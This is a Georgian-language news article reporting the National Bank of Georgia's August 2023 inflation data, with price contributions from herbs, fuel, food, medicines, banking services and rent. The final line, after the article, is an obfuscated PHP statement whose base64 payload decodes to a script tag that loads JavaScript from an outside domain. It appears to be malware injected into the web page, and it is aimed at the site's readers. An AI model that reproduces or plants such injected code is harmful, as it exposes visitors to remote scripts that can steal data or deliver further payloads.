celsiusi
ავერსი შნაიდერი

2023 წლის აგვისტოში წლიურმა ინფლაციამ 0.9% შეადგინა, ხოლო ივლისთან შედარებით, ფასებმა 0.7%-ით მოიმატა. ამის შესახებ ინფორმაციას საქართველოს ეროვნული ბანკი ავრცელებს.

მათივე ცნობით, დაბალ ინფლაციას დიდწილად ეგზოგენური შოკების ეტაპობრივი ამოწურვა განაპირობებს. კერძოდ, საერთაშორისო ბაზრებზე შემცირებული სურსათის ფასები და გაიაფებული საერთაშორისო გადაზიდვების ღირებულება საქართველოს ბაზარს გადმოეცა და ინფლაცია შეამცირა.

„ბოლოდროინდელმა ნავთობის ფასის ზრდამ, წინა თვესთან შედარებით, ბენზინის ფასი გააძვირა, თუმცა წლიურად კვლავ შემცირებულია. ინფლაციის დაბალ დონეზე შენარჩუნებას ასევე გამკაცრებული მონეტარული პოლიტიკაც ხელს უწყობს. აგვისტოში, წინა თვესთან შედარებით, ფასების საერთო დონეზე ყველაზე დიდი გავლენა მწვანილის ფასის 115.9%-ით ზრდას ჰქონდა, რამაც თვის ინფლაცია 0.4 პროცენტული პუნქტით გაზარდა. წინა თვესთან შედარებით, ბენზინის 4.2%-ით გაძვირებამ თვის ინფლაციაზე დამატებით 0.2 პროცენტული პუნქტით გავლენა იქონია.

ბოლო პერიოდში ბენზინის ფასების მატების მიუხედავად, წინა წელთან შედარებით, მისი დონე 22.0%-ით არის შემცირებული, რამაც წლიურ ინფლაციაში უარყოფითი 0.9-პროცენტულპუნქტიანი წვლილი შეიტანა. ამავდროულად, წლიურად 31.1%-ით არის გაიაფებული დიზელის ფასიც, რისი გავლენაც ინფლაციაზე უარყოფით 0.4 პროცენტულ პუნქტს შეადგენდა.

აგვისტოში სურსათის ფასები წლიურად 2.2%-ით არის გაზრდილი. გაძვირებული სურსათიდან გამოსარჩევია მწვანილი და ძროხის ხორცი, რომელთა ჯამური წვლილი წლიურ ინფლაციაში 0.9 პროცენტული პუნქტი იყო, ხოლო გაიაფებული სურსათიდან აღსანიშნავია მზესუმზირის ზეთი და პური. ამ ორი პროდუქტის გაიაფებამ ინფლაცია, ჯამში, 1.1 პროცენტული პუნქტით შეამცირა. აგვისტოში დანარჩენი პროდუქტებიდან გამოსარჩევი ფართოდ მოხმარებადი მედიკამენტების გაიაფება იყო, რაც, ჯამში, ინფლაციას 1.0 პროცენტული პუნქტით ამცირებდა, ხოლო გაზრდილი საბანკო მომსახურების და ბინის დაქირავების ღირებულება ინფლაციას, შესაბამისად, 0.4 პროცენტული პუნქტით და 0.2 პროცენტული პუნქტით ზრდიდა. საბაზო ინფლაცია, რომელიც სამომხმარებლო კალათიდან მაღალი მერყეობით გამორჩეულ სურსათის, ენერგომატარებლებისა და სიგარეტის ფასებს გამორიცხავს, შემცირდა და 2.5% შეადგინა“, – აღნიშნულია ეროვნული ბანკის ანგარიშში.

ამასთან, როგორც ცენტრალურ ბანკში განმარტავენ, ინფლაციის შემცირებას მეტწილად იმპორტული ინფლაციის კლება განაპირობებს. ბოლო ერთი წლის განმავლობაში იმპორტულ ინფლაციას, ძირითადად, მკვეთრად კლების ტენდენცია აქვს, რასაც, საერთაშორისო ბაზრებზე სასაქონლო პროდუქტების ფასების და საერთაშორისო ტრანსპორტირების ხარჯების შემცირებასთან ერთად, გამყარებული გაცვლითი კურსი უწყობს ხელს.

საქართველოს ეროვნული ბანკის ცნობით, აგვისტოში იმპორტირებული საქონლის წლიური 5.8%-იანი დეფლაცია დაფიქსირდა. დაახლოებით ასეთივე დინამიკა აქვს შერეულად წარმოებული პროდუქტების ფასებს, რომელთა დეფლაცია აგვისტოში 1.9%-ს გაუტოლდა.

„ადგილობრივად წარმოებული პროდუქტების წლიურმა ინფლაციამ, გასულ თვესთან შედარებით, 1.1 პროცენტული პუნქტით მოიკლო, თუმცა ჯერ ისევ მაღალია და 6.1%-ს შეადგენს. წინა თვესთან შედარებით, ადგილობრივი ინფლაციის შემცირება მეტწილად ზოგიერთი მომსახურებისა და სურსათის საბაზო ეფექტის ამოწურვის ხარჯზე მოხდა. ჯერ კიდევ მაღალ ადგილობრივ ინფლაციას მომსახურების წლიური გაძვირება (8.4%) განაპირობებს. თავის მხრივ, მომსახურების ინფლაციაში მაღალი წვლილი აქვს საბანკო მომსახურების გაძვირებას და გასულ წელს უცხოელთა რაოდენობის მკვეთრი მატების შედეგად გაზრდილ ბინის დაქირავების ღირებულებას“, – აღნიშნავენ მარეგულირებელში.

560
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");